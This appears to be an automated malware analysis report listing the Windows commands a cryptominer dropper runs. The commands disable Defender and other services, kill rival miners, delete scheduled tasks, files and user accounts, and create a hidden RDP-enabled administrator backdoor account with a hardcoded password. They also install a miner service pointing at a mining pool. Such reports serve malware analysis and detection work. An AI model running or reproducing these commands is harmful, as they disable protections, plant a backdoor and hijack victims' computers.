Technical Information
- '<SYSTEM32>\net.exe' stop LocalConnectXdc
- '<SYSTEM32>\net.exe' stop WindowsDefender
- '<SYSTEM32>\net.exe' stop LocalConnectMnr
- '<SYSTEM32>\net.exe' stop Service4
- '<SYSTEM32>\net.exe' stop sqlservrd
- '<SYSTEM32>\taskkill.exe' /IM cpuminer-sse42.exe /F
- '<SYSTEM32>\taskkill.exe' /IM msdtced.exe /F
- '<SYSTEM32>\taskkill.exe' /f /im HostXmrig.exe
- '<SYSTEM32>\taskkill.exe' /f /im 1.exe
- '<SYSTEM32>\net.exe' stop AdobeFlashPlayerHash
- '<SYSTEM32>\net.exe' stop reg
- '<SYSTEM32>\net.exe' stop RpcEptManger
- '<SYSTEM32>\net.exe' stop Samserver
- '<SYSTEM32>\net.exe' stop WinRDPSvc
- '<SYSTEM32>\net.exe' stop "CCOM Surrogate"
- '<SYSTEM32>\net.exe' stop MsUpdateServiceD
- '<SYSTEM32>\net.exe' stop TaskNetHost
- '<SYSTEM32>\net.exe' stop RegGroom
- '<SYSTEM32>\net.exe' stop Googler
- '<SYSTEM32>\net.exe' stop svchost
- '<SYSTEM32>\net.exe' stop WSService
- '<SYSTEM32>\taskkill.exe' /IM msiexeced.exe /F
- '<SYSTEM32>\taskkill.exe' /f /im user.exe
- '<SYSTEM32>\taskkill.exe' /f /im microsoft.exe
- '<SYSTEM32>\taskkill.exe' /f /im *tmp.exe
- '<SYSTEM32>\taskkill.exe' /f /im schtasks*
- '<SYSTEM32>\taskkill.exe' /f /im microsofts*
- '<SYSTEM32>\taskkill.exe' /f /im xmr*
- '<SYSTEM32>\taskkill.exe' /f /im wscript.exe
- '<SYSTEM32>\taskkill.exe' /f /im esif.exe
- '<SYSTEM32>\taskkill.exe' /f /im tmp*
- '<SYSTEM32>\taskkill.exe' /f /im rigx*
- '<SYSTEM32>\taskkill.exe' /f /im msiexec.exe
- '<SYSTEM32>\taskkill.exe' /f /im sa.exe
- '<SYSTEM32>\taskkill.exe' /IM monero.exe /F
- '<SYSTEM32>\taskkill.exe' /IM minerg.exe /F
- '<SYSTEM32>\taskkill.exe' /f /im ggdllhost.exe
- '<SYSTEM32>\taskkill.exe' /IM cpuminer.exe /F
- '<SYSTEM32>\taskkill.exe' /f /im Service4.exe
- '<SYSTEM32>\taskkill.exe' /f /im bitsadmin.exe
- '<SYSTEM32>\taskkill.exe' /f /im mxsvc.exe
- '<SYSTEM32>\taskkill.exe' /f /im update.exe
- '<SYSTEM32>\taskkill.exe' /f /im SystemRunDll3.exe
- %WINDIR%\Temp\Perflib_Perfdata_7e8.dat
- ClassName: '' WindowName: ''
- '<SYSTEM32>\sc.exe' config RpcEptManger start= Disabled
- '<SYSTEM32>\net1.exe' stop WinRDPSvc
- '<SYSTEM32>\sc.exe' config WinRDPSvc start= Disabled
- '<SYSTEM32>\cmd.exe' /c sc config WinDefend start= disabled
- '<SYSTEM32>\net1.exe' stop RpcEptManger
- '<SYSTEM32>\cmd.exe' /c sc config MsUpdateServiceD start= Disabled
- '<SYSTEM32>\net1.exe' stop Samserver
- '<SYSTEM32>\cmd.exe' /c sc config RpcEptManger start= Disabled
- '<SYSTEM32>\cmd.exe' /c net stop RpcEptManger
- '<SYSTEM32>\cmd.exe' /c net stop MsUpdateServiceD
- '<SYSTEM32>\cmd.exe' /c sc config WinRDPSvc start= Disabled
- '<SYSTEM32>\cmd.exe' /c net stop WinRDPSvc
- '<SYSTEM32>\cmd.exe' /c net user sqlserver h4ckerz90-@!
- '<SYSTEM32>\cmd.exe' /c net user sqlserver h4ckerz90-@! /ADD
- '<SYSTEM32>\net1.exe' stop MsUpdateServiceD
- '<SYSTEM32>\cmd.exe' /c net localgroup Administrators sqlserver /ADD
- '<SYSTEM32>\sc.exe' config "CCOM Surrogate" start= Disabled
- '<SYSTEM32>\cmd.exe' /c net localgroup "Remote Desktop users" sqlserver /ADD
- '<SYSTEM32>\sc.exe' stop WinDefend
- '<SYSTEM32>\sc.exe' config MsUpdateServiceD start= Disabled
- '<SYSTEM32>\cmd.exe' /c sc stop WinDefend
- '<SYSTEM32>\cmd.exe' /c sc config "CCOM Surrogate" start= Disabled
- '<SYSTEM32>\sc.exe' config WinDefend start= disabled
- '<SYSTEM32>\cmd.exe' /c net stop "CCOM Surrogate"
- '<SYSTEM32>\sc.exe' config TaskNetHost start= Disabled
- '<SYSTEM32>\sc.exe' config RegGroom start= Disabled
- '<SYSTEM32>\cmd.exe' /c sc config Googler start= Disabled
- '<SYSTEM32>\net1.exe' stop RegGroom
- '<SYSTEM32>\cmd.exe' /c sc config WSService start= Disabled
- '<SYSTEM32>\cmd.exe' /c net stop WSService
- '<SYSTEM32>\cmd.exe' /c sc config TaskNetHost start= Disabled
- '<SYSTEM32>\net1.exe' stop sqlservrd
- '<SYSTEM32>\sc.exe' config Service4 start= Disabled
- '<SYSTEM32>\net1.exe' stop reg
- '<SYSTEM32>\cmd.exe' /c net stop Googler
- '<SYSTEM32>\net1.exe' stop Service4
- '<SYSTEM32>\net1.exe' stop WSService
- '<SYSTEM32>\cmd.exe' /c net stop Samserver
- '<SYSTEM32>\sc.exe' config WSService start= Disabled
- '<SYSTEM32>\sc.exe' config Samserver start= Disabled
- '<SYSTEM32>\net1.exe' stop svchost
- '<SYSTEM32>\cmd.exe' /c sc config Samserver start= Disabled
- '<SYSTEM32>\net1.exe' stop Googler
- '<SYSTEM32>\cmd.exe' /c net stop svchost
- '<SYSTEM32>\sc.exe' config Googler start= Disabled
- '<SYSTEM32>\sc.exe' config svchost start= Disabled
- '<SYSTEM32>\net1.exe' stop TaskNetHost
- '<SYSTEM32>\cmd.exe' /c sc config svchost start= Disabled
- '<SYSTEM32>\net1.exe' accounts / MaxPWAge: unlimited
- '<SYSTEM32>\net1.exe' localgroup Administratorer sqlserver /ADD
- '<SYSTEM32>\net1.exe' localgroup Administrateurs sqlserver /ADD
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
- '<SYSTEM32>\cmd.exe' /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
- '<SYSTEM32>\net1.exe' user sqlserver /expires:never
- '<SYSTEM32>\net.exe' localgroup Administratoren sqlserver /ADD
- '<SYSTEM32>\net1.exe' localgroup Administratorzy sqlserver /ADD
- '<SYSTEM32>\cmd.exe' /c net accounts / MaxPWAge: unlimited
- '<SYSTEM32>\net1.exe' localgroup Administratoren sqlserver /ADD
- '<SYSTEM32>\cmd.exe' /c net user sqlserver /active:yes
- '<SYSTEM32>\net.exe' accounts / MaxPWAge: unlimited
- '<SYSTEM32>\cmd.exe' /c gpupdate /force
- '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
- '<SYSTEM32>\cmd.exe' /c SCHTASKS /Delete /TN * /F
- '<SYSTEM32>\gpupdate.exe' /force
- '<SYSTEM32>\net.exe' start termservice
- '<SYSTEM32>\schtasks.exe' /Delete /TN * /F
- '<SYSTEM32>\cmd.exe' /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v sqlserver /t REG_DWORD /d 0 /f
- '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
- '<SYSTEM32>\net.exe' user sqlserver /active:yes
- '<SYSTEM32>\cmd.exe' /c net start termservice
- '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v sqlserver /t REG_DWORD /d 0 /f
- '<SYSTEM32>\net1.exe' user sqlserver /active:yes
- '<SYSTEM32>\net.exe' localgroup "Remote Desktop users" sqlserver /ADD
- '<SYSTEM32>\cmd.exe' /c net localgroup Administrateurs sqlserver /ADD
- '<SYSTEM32>\net.exe' localgroup Administradores sqlserver /ADD
- '<SYSTEM32>\net1.exe' localgroup Administradores sqlserver /ADD
- '<SYSTEM32>\net1.exe' user sqlserver h4ckerz90-@! /ADD
- '<SYSTEM32>\net.exe' localgroup Administrators sqlserver /ADD
- '<SYSTEM32>\cmd.exe' /c net localgroup Amministratori sqlserver /ADD
- '<SYSTEM32>\net.exe' user sqlserver h4ckerz90-@! /ADD
- '<SYSTEM32>\net1.exe' stop "CCOM Surrogate"
- '<SYSTEM32>\net.exe' localgroup Amministratori sqlserver /ADD
- '<SYSTEM32>\cmd.exe' /c net localgroup Administradores sqlserver /ADD
- '<SYSTEM32>\net.exe' user sqlserver h4ckerz90-@!
- '<SYSTEM32>\cmd.exe' /c net user sqlserver /expires:never
- '<SYSTEM32>\net.exe' localgroup Administrateurs sqlserver /ADD
- '<SYSTEM32>\cmd.exe' /c net localgroup Administratorer sqlserver /ADD
- '<SYSTEM32>\net.exe' user sqlserver /expires:never
- '<SYSTEM32>\net1.exe' localgroup Administrators sqlserver /ADD
- '<SYSTEM32>\net.exe' localgroup Administratorer sqlserver /ADD
- '<SYSTEM32>\net1.exe' localgroup Amministratori sqlserver /ADD
- '<SYSTEM32>\net1.exe' localgroup "Remote Desktop users" sqlserver /ADD
- '<SYSTEM32>\cmd.exe' /c net localgroup Administratorzy sqlserver /ADD
- '<SYSTEM32>\net.exe' localgroup Administratorzy sqlserver /ADD
- '<SYSTEM32>\net1.exe' user sqlserver h4ckerz90-@!
- '<SYSTEM32>\cmd.exe' /c net localgroup Administratoren sqlserver /ADD
- '<SYSTEM32>\cmd.exe' /c del /a %windir%\*.bat
- '<SYSTEM32>\cmd.exe' /c del /a %windir%\*.vbs
- '<SYSTEM32>\cmd.exe' /c taskkill /IM msdtced.exe /F
- '<SYSTEM32>\cmd.exe' /c del /a %programdata%\*.exe
- '<SYSTEM32>\cmd.exe' /c del /a %programdata%\*.bat
- '<SYSTEM32>\cmd.exe' /c del /a %programdata%\*.vbs
- '<SYSTEM32>\cmd.exe' /c taskkill /IM minerg.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /IM monero.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im ggdllhost.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /IM msiexeced.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /IM cpuminer-sse42.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /IM cpuminer.exe /F
- '<SYSTEM32>\cmd.exe' /c rmdir /s /q %windir%\xx64
- '<SYSTEM32>\cmd.exe' /c rmdir /s /q %windir%\xx32
- '<SYSTEM32>\cmd.exe' /c rmdir /s /q %programdata%\32
- '<SYSTEM32>\cmd.exe' /c del /a %windir%\mpl.exe
- '<SYSTEM32>\cmd.exe' /c rmdir /s /q %windir%\x64
- '<SYSTEM32>\cmd.exe' /c rmdir /s /q %windir%\x32
- '<SYSTEM32>\cmd.exe' /c del /q /a <SYSTEM32>\monero.exe
- '<SYSTEM32>\cmd.exe' /c del /a %windir%\microsofts.exe
- '<SYSTEM32>\cmd.exe' /c del /a %windir%\microsoft.exe
- '<SYSTEM32>\cmd.exe' /c rmdir /s /q %programdata%\x32
- '<SYSTEM32>\cmd.exe' /c rmdir /s /q %programdata%\x64n
- '<SYSTEM32>\cmd.exe' /c rmdir /s /q %programdata%\x64
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im xmr*
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im rigx*
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im wscript.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im microsofts*
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im esif.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im microsoft.exe
- '<SYSTEM32>\cmd.exe' /c %windir%\fonts\conhost set sqlbrowsers Description "sqlbrowser"
- '<SYSTEM32>\cmd.exe' /c %windir%\fonts\conhost set sqlbrowsers AppParameters "-a cryptonight -o cloudfront-lc.ddnsking.com:443 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5v...
- '<SYSTEM32>\cmd.exe' /c %windir%\fonts\conhost install sqlbrowsers "%windir%\fonts\sqlservr.exe"
- '<SYSTEM32>\cmd.exe' /c %windir%\fonts\conhost start sqlbrowsers
- '<SYSTEM32>\cmd.exe' /c %windir%\fonts\conhost set sqlbrowsers Start SERVICE_DELAYED_AUTO_START
- '<SYSTEM32>\cmd.exe' /c %windir%\fonts\conhost set sqlbrowsers DisplayName "sqlserverd"
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im bitsadmin.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im update.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im msiexec.exe
- '<SYSTEM32>\cmd.exe' /c rmdir /s /q %windir%\temp
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im SystemRunDll3.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im sa.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im user.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im schtasks*
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im tmp*
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im mxsvc.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im Service4.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im *tmp.exe
- '<SYSTEM32>\sc.exe' config WindowsDefender start= Disabled
- '<SYSTEM32>\cmd.exe' /c net stop sqlservrd
- '<SYSTEM32>\cmd.exe' /c sc config LocalConnectMnr start= Disabled
- '<SYSTEM32>\cmd.exe' /c net stop Service4
- '<SYSTEM32>\cmd.exe' /c sc config sqlservrd start= Disabled
- '<SYSTEM32>\sc.exe' config LocalConnectXdc start= Disabled
- '<SYSTEM32>\cmd.exe' /c net stop LocalConnectXdc
- '<SYSTEM32>\sc.exe' config AdobeFlashPlayerHash start= Disabled
- '<SYSTEM32>\net1.exe' user systems /delete
- '<SYSTEM32>\cmd.exe' /c net stop LocalConnectMnr
- '<SYSTEM32>\net1.exe' stop AdobeFlashPlayerHash
- '<SYSTEM32>\cmd.exe' /c sc config LocalConnectXdc start= Disabled
- '<SYSTEM32>\net1.exe' stop LocalConnectMnr
- '<SYSTEM32>\cmd.exe' /c net stop RegGroom
- '<SYSTEM32>\net1.exe' stop LocalConnectXdc
- '<SYSTEM32>\cmd.exe' /c net stop TaskNetHost
- '<SYSTEM32>\sc.exe' config reg start= Disabled
- '<SYSTEM32>\cmd.exe' /c sc config RegGroom start= Disabled
- '<SYSTEM32>\cmd.exe' /c sc config Service4 start= Disabled
- '<SYSTEM32>\sc.exe' config LocalConnectMnr start= Disabled
- '<SYSTEM32>\net1.exe' stop WindowsDefender
- '<SYSTEM32>\cmd.exe' /c sc config reg start= Disabled
- '<SYSTEM32>\sc.exe' config sqlservrd start= Disabled
- '<SYSTEM32>\cmd.exe' /c net stop reg
- '<SYSTEM32>\net.exe' user Admiin /delete
- '<SYSTEM32>\cmd.exe' /c net user .system /delete
- '<SYSTEM32>\cmd.exe' /c net user emad /delete
- '<SYSTEM32>\cmd.exe' /c net user systems /delete
- '<SYSTEM32>\net.exe' user emad /delete
- '<SYSTEM32>\net.exe' user sysdba /delete
- '<SYSTEM32>\cmd.exe' /c del /a %windir%\csrss.exe
- '<SYSTEM32>\cmd.exe' /c del /a %windir%\dllhostts.exe
- '<SYSTEM32>\cmd.exe' /c rmdir /s /q %programdata%\ServiceProfiles
- '<SYSTEM32>\cmd.exe' /c net user ` /delete
- '<SYSTEM32>\cmd.exe' /c net user Admiin /delete
- '<SYSTEM32>\cmd.exe' /c net user sysdba /delete
- '<SYSTEM32>\net1.exe' user ` /delete
- '<SYSTEM32>\net1.exe' user sysdba /delete
- '<SYSTEM32>\cmd.exe' /c sc config AdobeFlashPlayerHash start= Disabled
- '<SYSTEM32>\cmd.exe' /c sc config WindowsDefender start= Disabled
- '<SYSTEM32>\cmd.exe' /c net stop WindowsDefender
- '<SYSTEM32>\net1.exe' user emad /delete
- '<SYSTEM32>\net.exe' user ` /delete
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im HostXmrig.exe
- '<SYSTEM32>\net1.exe' user Admiin /delete
- '<SYSTEM32>\cmd.exe' /c net stop AdobeFlashPlayerHash
- '<SYSTEM32>\net.exe' user systems /delete
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im 1.exe